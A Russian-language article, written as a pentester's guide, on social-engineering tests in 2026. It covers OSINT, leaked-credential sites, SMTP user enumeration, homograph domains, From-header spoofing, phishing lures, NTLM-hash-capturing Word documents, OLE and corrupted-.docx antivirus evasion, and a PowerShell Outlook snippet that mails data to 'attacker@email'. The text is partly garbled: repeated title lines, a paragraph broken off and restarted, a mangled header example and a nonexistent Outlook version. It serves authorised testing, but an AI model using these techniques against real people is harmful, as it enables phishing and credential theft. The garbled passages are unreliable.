Инструменты и техники социальной инженерии: актуальные практики 2026 года

В середине 2026 года социотехническое тестирование стало неотъемлемой частью комплексного аудита кибербезопасности. За годы практики я неоднократно убеждался, что социальная инженерия — это не просто «хитрость», а тонкий процесс, где каждая деталь влияет на результат. В этой статье я поделюсь проверенными техниками и нюансами, которые особенно актуальны в текущем году.

Инструменты и техники социальной инженерии: актуальные практики 2026 года

О важности социальной инженерии в 2026 году даже не приходится спорить. Новости регулярно сообщают о новых волнах целевых атак: APT-группировки совершенствуют сценарии, а почтовые каналы по-прежнему остаются одним из самых эффективных векторов для распространения вредоносного ПО. Carbanak, Buhtrap, BlackOasis, GHOUL — эти названия давно стали маркерами сложных, многоэтапных кампаний, и их методы до сих пор служат источником тактических идей как для защитников, так и для пентестеров.

Цели тестирования

Перед стартом социотехнического теста в 2026 году критически важно согласовать с заказчиком не только формальные параметры, но и реальные ожидания. Недопонимание на этом этапе может полностью исказить результаты: например, тест, задуманный как проверка осведомлённости сотрудников, по факту превратится в проверку работы песочниц и фильтров.

Чаще всего цели заказчика укладываются в несколько типовых сценариев:

  • оценить или подготовить работу центра реагирования (CERT, SOC);
  • измерить уровень осведомлённости персонала;
  • проверить корректность настройки спам‑фильтров, песочниц и антивирусов.

Во всех этих случаях ключевой метрикой остаётся поведение пользователей при взаимодействии с фишинговыми рассылками. Однако на практике регулярно возникают курьёзы: после тестовой рассылки заказчик может запросить полноценное расследование инцидента, забыв, что сам инициировал пентест. Или ИТ‑отдел, заметив аномалию в почтовом трафике, блокирует тестовые письма — и тогда тест фактически оценивает не реакцию пользователей, а работу защитных систем.

Поэтому все спорные моменты нужно проговаривать заранее. От заявленной цели зависит и стратегия рассылки. Если задача — проверить именно пользователей, допустимо отправлять письма всей команде, договорившись, что рассылки не будут блокироваться. Если же цель — протестировать ещё и спам‑фильтры, мы обычно выбираем небольшую группу сотрудников с относительно низким уровнем осведомлённости в вопросах кибербезопасности: бухгалтерию, административный отдел, юридический департамент. Рассылка в этом случае идёт точечно, с индивидуальными вариациями писем и временными задержками между отправками.

Важно помнить: наши цели принципиально отличаются от намерений реальных злоумышленников. Для них главная задача — заразить рабочие станции и проникнуть во внутреннюю инфраструктуру компании, чтобы похитить конфиденциальные данные. Наша цель — собрать данные о реакции пользователя: открыл ли он вложение, в какое время это произошло, какая у него ОС и браузер. Вся эта информация помогает заказчику точечно устранять уязвимости.

При этом в части обхода политик безопасности пентест и реальная атака во многом схожи: и в том, и в другом случае нужно добиться того, чтобы фишинговая ссылка или пейлоад достигли рабочей станции пользователя.

Модель нарушителя

Модели нарушителя традиционно делят на две категории: внутренний и внешний. Внутренний нарушитель либо обладает инсайдерской информацией, либо уже находится внутри сети организации. Внешний нарушитель стартует с минимальным набором сведений — как правило, это название компании, её отрасль и другая общедоступная информация.

Эта классификация напрямую влияет на подход к рассылке. Если мы моделируем действия внешнего нарушителя, типичным сценарием будет отправка писем от имени сторонней организации с просьбой проверить выписку по счёту — для этого пользователю нужно либо открыть вложение, либо перейти по ссылке. По опыту работы в первой половине 2026 года такие рассылки нередко показывают невысокую эффективность: чтобы её повысить, нужно уделить максимум внимания этапу разведки и собрать как можно больше релевантных данных о компании — от email‑адресов сотрудников до географического расположения офисов и внутренней структуры подразделений.

Если же сценарий предполагает модель внутреннего нарушителя, часть этой информации можно получить напрямую от заказчика — вплоть до предоставления самих адресов сотрудников для тестовой рассылки.

Разведка: пассивный сбор

Инструментов для автоматизированного сбора данных сегодня настолько много, что их количество кажется почти бесконечным. Среди наиболее известных решений — SpiderFoot, intrigue core, DataSploit, Maltego, theHarvester. Однако при работе с русскоязычным сегментом многие из них демонстрируют посредственные результаты.

В своей практике я опираюсь на набор утилит, лучше адаптированных к реалиям СНГ. В частности, хорошо себя зарекомендовали SimplyEmail, ePochta Extractor и FOCA. SimplyEmail особенно эффективен при поиске email‑адресов в странах СНГ, а FOCA позволяет быстро структурировать и анализировать документы, найденные в поисковых системах и на сайтах заказчика, — с его помощью удобно извлекать адреса и другие полезные сведения.

Параллельно проводим разведку по всей инфраструктуре заказчика — так же, как и при классическом пентесте. Это включает анализ DNS, поиск поддоменов, определение используемых IP‑адресов и другие стандартные процедуры. Большинство необходимых для этого инструментов собраны на osintframework.com. Из того, что я чаще всего использую в 2026 году, можно выделить:

  • Whois History;
  • pentest‑tools.com, dnsdumpster.com;
  • dnsmap, knock.py, sublist3r, sublazerwlst.

Не менее продуктивным оказывается анализ социальных сетей — ВК, «Одноклассники», Facebook, LinkedIn и других площадок. Пользователи часто указывают место работы в своих профилях, и это даёт возможность целенаправленно искать сотрудников нужной компании. Для автоматизации сбора данных применяются специализированные утилиты — например, linkedin_profiles.py и corpint. Также стоит обратить внимание на репозиторий aleph data: там собрано множество инструментов для анализа информации из соцсетей.

Отдельного внимания заслуживают Instagram иrapid-search-engine, с их возможностями поиска по геолокации. Если известно местоположение компании, можно изучить фотографии, сделанные сотрудниками рядом с офисом или даже внутри него. Иногда на снимках попадают экраны мониторов — а на них можно разглядеть внутренние номера, почтовые адреса, иконки программ. Даже такая, казалось бы, мелкая деталь, как версия Outlook, способна существенно повысить эффективность атаки — или, в нашем случае, теста.

Ещё один неочевидный индикатор — лайки в Facebook. Нередко компании просят сотрудников поддержать корпоративную страницу: «Поставьте лайк и подпишитесь». Такой лайк может служить косвенным подтверждением того, что человек действительно работает в организации.

Инструменты и техники социальной инженерии: актуальные практики 2026 года

Кроме того, в арсенале исследователя есть специализированные ресурсы, позволяющие находить утекшие базы данных и выполнять локальный поиск адресов. Среди них — databases.today, mmnt, ftplike, metabot, rapid‑search‑engine, alluc.ee и другие. Не стоит забывать и о leakedsource, где собрано порядка трёх миллиардов учётных записей. Ещё более масштабным ресурсом является weleakinfo — он содержит уже пять миллиардов записей и позволяет выполнять поиск по маске, чтобы находить адреса, привязанные к конкретному домену. Такой подход часто даёт весьма внушительные результаты.

Если у компании «странные» политики безопасности и принудительная смена пароля вовсе отсутствует, то бывает так, что модель внешнего нарушителя становится внутренней (с разрешения заказчика, конечно), потому что пароль учётной записи подходит и можно зайти в его почту и рассылать письма с внутреннего адреса. Почти всегда результаты потрясающие.

Разведка: активный сбор

Помимо email, полезно выяснять должности сотрудников и общую структуру компании. Также я всегда стараюсь собирать ФИО — они пригодятся на этапе составления внешнего вида письма. В ход идут и разные инструменты для перебора директорий — часто можно найти директории, куда сотрудники скидывают документы. Там в числе прочего могут обнаружиться полезные метаданные или непубличная информация о компании, оставленные временные файлы. А ещё, бывает, попадаются фотографии, сделанные в офисе, и другие интересные вещи.

Инструменты и техники социальной инженерии: актуальные практики 2026 года

Один из инструментов, которые всегда под рукой, — это Google (см. статью «Google Dorks»). Также вам пригодятся утилиты и словари для перебора директорий: DIRB, dirsearch, fuzz.txt и так далее.

В итоге все собранные и сгенерированные результаты по логинам и email придётся перебирать на SMTP, например при помощи smtp-user-enum.pl. По опыту 2026 года, команды VRFY и EXPN почти всегда отключены, работает только RCPT. Тут встречается глупая, но тем не менее распространённая ошибка: люди берут базу из 1000 имён и 9000 фамилий и пытаются брутить по ним. На это уходит невероятное количество времени и трафика. Шанс, что админы заметят его и заблокируют, возрастает почти до 100 %. Так делать не нужно.

Если вы уже установили, что в корпоративных адресах используется первая буква имени, то берите топ букв для мужских и женских имён. Для мужчин это n, i, p, e, k, m и так далее в порядке убывания распространённости, для женщин — a, e, m, d, y, o, n, t, v… 9000 фамилий тоже брать не нужно — достаточно нескольких сотен наиболее популярных.

Другая частая ошибка — пытаться сгенерировать женские фамилии из мужских, добавляя окончание ‑а. Это очень грубый метод, который даёт много ошибок, — гораздо лучше будет использовать раздельные базы фамилий.

Также надо помнить, что, помимо SMTP, существует такая штука, как Lync (сейчас она называется Skype for Business), и у неё свой API, на котором тоже отлично можно валидировать учётные записи пользователей (см. скрипт lyncsmash.py). Встречаются и другие внутренние корпоративные сервисы, которые можно найти на поддоменах.

Домен

В какой‑то момент вам понадобится создать фишинговый домен — он бывает нужен как для рассылки, так и для создания фейк‑сайта или портала компании. Для этого есть утилита URLCrazy, но она не умеет делать гомографические домены (домены, в которых можно использовать Unicode), а вот CATPHISH умеет. Помимо этого, в наборе утилит хорошо иметь dnstwist.

Инструменты и техники социальной инженерии: актуальные практики 2026 года

С регистрацией таких доменов, кстати, была проблема: когда я пробовал заменить символом Unicode только одну букву, все доменные регистраторы отказывали мне и требовали заменить на Unicode все символы. В наших целях это часто проблематично, потому что полностью совпадающих символов не так много, а появления всяких дефисов и точек в адресе хочется избежать. Из тех регистраторов, с которыми я имел дело, единственный, который разрешил менять один символ, — это GoDaddy.

Также я проверил, как разные почтовые клиенты парсят punycode — репрезентацию юникодных доменов в виде ASCII (вы наверняка встречали эти сочетания типа xn--). Так вот, выяснилось, что Outlook 2013, 2015 и 2016, а также The Bat вместо них показывают Unicode, пряча от пользователя наш небольшой трюк. В IBM Notes, Thunderbird, Mail из Windows 10 и macOS и Web Outlook такое, к сожалению, не сработает.

Как снизить вероятность того, что спам‑фильтры будут заворачивать рассылку? В первую очередь надо грамотно настроить Sender Policy Framework (example.org. IN TXT «v=spf1 +a +mx +all»). Тогда почтовый сервер сможет убедиться, что отправленное вами письмо действительно отправлено с того IP, который указан в DNS‑записи A или MX.

Точно так же с DomainKeys Identified Mail. Попробую объяснить упрощённо: грубо говоря, есть публичный и приватный ключи, и, когда вы отправляете письмо со своего сервера, он подписывает ваше письмо; одна запись будет находиться на сервере DNS, другая — внутри письма. Во время приёма письма сервер проверяет, сходятся ли ключи, и если да, то повышает доверие к письму. Также необходимо знать о записи PTR. Это обратная запись DNS: она находится на сервере и говорит о том, что ресурс ссылается на какое‑то определённое доменное имя.

Проверить, всё ли верно настроено, и узнать рейтинг доверия к письму позволяет сервис realemail@mail.ltd.

Предварительная рассылка

Если заказчик с пониманием относится к тестированию и разрешает нам сделать предварительную рассылку, мы выбираем десять‑пятнадцать пользователей и шлем им на почту письма, на которые с большой вероятностью ответят. Не фишинг с акциями или призами, а какую‑нибудь просьбу, например: «Ваш коллега сказал, что вы можете мне помочь и прислать внутренний номер другого сотрудника». В ответе обычно приходит что‑то вроде «Нет, я не знаю, кто это такая…». Но это и не важно: важно просто получить ответ. Кроме этого, можно попробовать отправить письмо на несуществующий адрес: часто SMTP‑сервер присылает ответное письмо об отсутствии адресата.

Что мы получаем таким образом? Самое главное — наличие или отсутствие корпоративной подписи и её внешний вид. Кроме этого, мы узнаем, как в компании выглядит заголовок From и как написаны имена и фамилии. Например, фамилии могут быть на русском или транслитом, причём транслитерация может выглядеть по‑разному: «ю» может писаться как ju, так и yu. Или, например, ФИО может быть написано целиком. В общем, куча разных вариантов, которые придётся учесть на этапе рассылки. Помимо этого, вы можете получить внутренний телефонный номер — он может пригодиться для социалки по телефону.

Инструменты и техники социальной инженерии: актуальные практики 2026 года

Можно даже завязать беседу с сотрудником и в одном из сообщений отправить ссылку на фишинговую страницу. По ссылке при этом может быть просто 404. Нередко бывают случаи, когда пользователь в ответ отправляет вам скрин, а на нём может быть видно, какой браузер или почтовый клиент используется.

Заголовки писем — тоже важный источник информации. Там наверняка отметятся антивирусы и другие средства защиты — они любят это делать, причём сообщают и версии, и дату последнего обновления баз. Ну и конечно, из заголовков можно получить название почтовика и некоторые внутренние адреса (что может дальше пригодиться для пентеста). Ни в коем случае не проходите мимо такой возможности!

Содержимое письма

Я не люблю социалку с письмами от начальства, а также про зарплаты, увольнения и прочее в таком духе. Кого хоть раз увольняли через письмо? А письма от начальства сейчас выглядят примерно так же правдоподобно, как в 2005 году выглядели письма «Вы миллионный посетитель, введите данные карты». В общем, скучно, глупо и неинтересно.

Гораздо больше мне нравится придумывать что‑нибудь пооригинальнее.

Например, трюк с недоставленными сообщениями, когда пользователю приходит уведомление об ошибке доставки письма, которое он не отправлял. Обычно он думает: «Что за письмо? Я не отправлял такое. Какое‑то вложение, ну‑ка, ну‑ка!»

Привязка ко времени тоже чаще всего оказывается удачной идеей. Любой большой праздник вроде Нового года или Восьмого марта отлично годится. Пишем: «Надо сдать деньги, вот список тех, кто не хочет сдавать, запишите себя, если не хотите» — и прикладываем документ Excel. Редко кто откажется от соблазна глянуть на «позорный список».

Как вариант — можно изображать внутреннюю рассылку: попросить подойти в бухгалтерию, распечатав и заполнив какие‑то бумажки, принести какие‑то справки, которые предварительно необходимо открыть. В общем, всё, что приходит на почту каждый день и покажется пользователю обыденным, но при этом что обязательно откроют, если в письме будет написано, что это срочно.

Фишинг

С фишингом всё просто. Если мы изображаем внутреннюю рассылку, то достаточно попросить перейти по ссылке на корпоративный портал, где для входа потребуется ввести свой логин и пароль в обычную Basic‑аутентификацию. Либо мы можем подделать оповещение от одного из сервисов, используемых в компании (Confluence, Jira и так далее). Как раз тут нам и пригодится брутфорс поддоменов, в ходе которого вы выясните, что именно используется. Не забудьте прикрепить favicon.ico!

Оформление

Оформление — одна из самых важных частей, от которой будет зависеть успешность рассылки. Именно благодаря оформлению повышается доверие пользователя к письму. Во‑первых, постарайтесь получить образец корпоративной подписи: подделать её будет особенно полезно, если она заметная — например, с картинкой. Иногда она так хорошо привлекает внимание, что люди даже не посмотрят на сторонний домен.

Занятный факт: самое любимое слово у каждого человека — это его имя. Если обращаться к сотруднику по имени, а ещё лучше — с отчеством, то это повысит шансы, что он откроет письмо и, возможно, вложение.

Ещё одна интересная вещь — это CC. Подредактировав заголовок письма, в копию можно поставить вообще любых пользователей. При этом письмо не отправится им, но в клиенте будет отображаться, что они есть в копии. Туда можно внести любых сотрудников, и это тоже неплохо повышает уровень доверия пользователя.

Ребята с Defcon Moscow недавно нашли баг в Outlook: заголовок From парсится неправильно, что даёт возможность указать фейковую почту вместо реальной. Отображаться при этом будет именно фейковая, но письмо не считается спамом и проходит все проверки. Если отправить письмо с заголовком From: Fake Mail fake@mail.ru realemail@mail.ltd, в некоторых клиентах оно будет отображаться как отправленное с fake@mail.ru.<a href=«mailto:fake@mail.ru»>fake@mail.ru</a><a href=«mailto:realemail@mail.ltd»>realemail@mail.ltd</a>” will show it as В некоторых клиентах ссылка ведет на fake@mail.ru

Инструменты и техники социальной инженерии: актуальные практики 2026 года

Другой классный трюк, о котором стоит помнить, — это возможность использовать формат переписки. Делаем письмо с ответом на другое письмо, которого в реальности не было. Например, как бы приводим цитату письма от начальства, где сообщается, что что‑то нужно срочно сделать, и прикладываем документ. Внимание пользователя в таком случае гарантировано, и, по моей статистике, шанс того, что он откроет вложение, тоже значительно повышается.

В идеале вы должны соблюсти шрифты, цвет и прочие особенности письма с учётом того, какой почтовик вы подделываете. Например, в Outlook первое письмо всегда пишется шрифтом Courier и первое сообщение — чёрным цветом, а остальные уже синие. Это мелкая особенность, но достижение максимальной правдоподобности в данном случае очень важно.

Ну и конечно, вы можете захотеть скрыть адреса ссылок — например, в HTML можно подставить в атрибут href одно, а в текст ссылки — совсем другое. Но спам‑фильтр, увидев такое, может завернуть письмо. А вот From письма стоит подделать так, чтобы оно выглядело как у всех в фирме. Обязательно посмотрите, что конкретно там указано, — имя и фамилия, или ФИО целиком, или ещё какой‑нибудь вариант.

Не забывайте и про Open Redirect. Его, на мой взгляд, вполне можно считать уязвимостью. В социалке он работает очень хорошо: например, мы можем использовать главный домен банка, а дальше в ссылке — Open Redirect, который будет перекидывать на наш домен.

Инструменты и техники социальной инженерии: актуальные практики 2026 года

Пейлоад

Конечно, вы можете использовать Dynamic Data Exchange, который недавно был очень популярен, но теперь его блокируют почти все антивирусы. Можете упаковывать в архив с паролем, чтобы пользователь минут пять пытался этот архив открыть. Можете взять JS, MHT и MHTA, которые тоже давно блокируются антивирусами, или RTF, где тоже

Пейлоад: актуальные подходы в 2026 году

Динамический обмен данными (DDE) ещё недавно считался чуть ли не «золотым стандартом» для доставки пейлоадов, но к середине 2026 года антивирусы научились распознавать такие техники практически мгновенно. Аналогичная судьба постигла JS, MHT, MHTA и даже RTF‑файлы: после череды громких инцидентов с участием APT‑группировок защитные решения стали агрессивно блокировать любые подозрительные макросы и скрипты.

Я в своей практике в 2026 году почти не использую эти устаревшие векторы — разве что в редких случаях, когда по данным предварительного анализа в инфраструктуре заказчика стоят устаревшие средства защиты. Вместо этого я делаю ставку на более тонкие и менее очевидные методы.

Один из рабочих вариантов — загрузка контента по внешней ссылке через внедряемый объект в документе Word. Пользователь открывает файл, Word запрашивает внешний ресурс, и мы получаем сетевой отклик — в ряде случаев это позволяет зафиксировать NTLM‑хеш при работе с инструментом типа Responder. Такой подход выглядит легитимно для многих фильтров, потому что сам документ не содержит вредоносного кода, а лишь инициирует запрос.

Другой проверенный вариант — OLE‑объекты. В документ Word можно вставить OLE‑объект, оформить его под «обычный» файл (например, под Excel‑таблицу или ZIP‑архив) и добиться того, что пользователю потребуется всего несколько кликов для активации. В августе 2026 года такой метод остаётся одним из самых результативных при условии, что оформление максимально соответствует корпоративному стилю компании.

Проблемы: нюансы, которые нельзя игнорировать

Один из самых частых вопросов, который задают начинающие пентестеры: «В какое время лучше всего отправлять письма, чтобы их открывали?» Единого ответа тут нет, и в 2026 году дискуссии на профильных форумах по-прежнему не утихают.

Есть несколько популярных гипотез:

  • Сразу после обеда. Считается, что сытость и расслабленность могут снижать бдительность пользователя.
  • До обеда, в интервале 11:00–13:00. В это время сотрудники часто пытаются успеть сделать максимум задач, из‑за чего могут действовать на автомате и не замечать подозрительных деталей.
  • Около 18:00. К концу рабочего дня люди торопятся завершить дела и уйти домой, поэтому могут быстрее кликать по ссылкам, не читая письмо внимательно.

На практике оптимальный момент зависит от специфики компании: в одних организациях пик активности приходится на утро, в других — на вторую половину дня. Поэтому я рекомендую при возможности проводить тестовые рассылки в разное время и фиксировать статистику открытий и кликов.

Ещё одна серьёзная проблема — блокировка писем антивирусами, спам‑фильтрами и песочницами. Даже грамотно составленное письмо может не дойти до пользователя, если защитные системы сочтут его подозрительным. Существуют различные техники обхода песочниц, но в условиях «чёрного ящика» (когда у пентестера нет данных о конфигурации защиты) задача сильно усложняется.

Интересный приём, который до сих пор даёт результат, — использование особенностей обработки «битых» документов в Word. Поскольку .docx‑файл по сути является ZIP‑архивом, при повреждении некоторых служебных байтов архиватор уже не сможет его открыть, а Word — сможет, показав пользователю предупреждение о восстановлении. Файл проходит антивирусную проверку, а затем открывается у пользователя. В 2026 году этот метод всё ещё встречается в реальных сценариях, хотя некоторые современные решения уже умеют детектировать подобные аномалии.

Третья большая сложность — работа в средах с жёсткими сетевыми ограничениями. Бывает, что в компании заблокированы HTTP‑соединения и даже DNS‑запросы. В таких условиях доставка пейлоада становится нетривиальной задачей. Отправка писем на личные почтовые ящики сотрудников — вариант, который заказчики обычно не одобряют, и я его не рекомендую.

Однако если письмо всё же дошло до сотрудника, значит, какой‑то канал связи работает. Чаще всего это сама почтовая система. В таких случаях можно использовать COM‑объекты Outlook для отправки письма изнутри учётной записи пользователя. Например, такой PowerShell‑скрипт позволяет создать и отправить письмо:

powershell

ПереноситьСвернутьКопировать

$Outlook = New-Object -ComObject Outlook.Application

$Mail = $Outlook.CreateItem(0)

$Mail.To = «attacker@email»

$Mail.Subject = «Subj»

$Mail.Body = «Message»

$Mail.Send()

Этот подход возможен только в рамках согласованного пентеста и при наличии соответствующих разрешений от заказчика.

Выводы: что рекомендовать заказчику в 2026 году

По итогам многочисленных социотехнических тестов я сформировал типовой набор рекомендаций, который чаще всего предлагаю заказчикам:

  • Мониторинг аномалий почтового трафика. Важно не просто блокировать подозрительные письма, но и анализировать паттерны: откуда они приходят, в какое время, какие темы используют.
  • Настройка песочниц и спам‑фильтров. Песочницы должны уметь анализировать не только вложения, но и ссылки, а также поведение документов при открытии.
  • Регулярное обучение сотрудников. Тренинги по кибербезопасности должны быть не формальностью, а практикой: с примерами реальных писем, разбором ошибок и тестированием знаний.
  • Проведение социотехнического тестирования. Периодические пентесты с элементами социальной инженерии помогают выявлять слабые места в защите и оценивать реальный уровень осведомлённости персонала.

В 2026 году социальная инженерия остаётся одним из самых эффективных векторов атак — и одновременно одним из самых наглядных способов показать заказчику, где именно кроются риски. Грамотно организованный пентест не просто выявляет уязвимости, но и помогает выстроить более устойчивую систему защиты.

2
1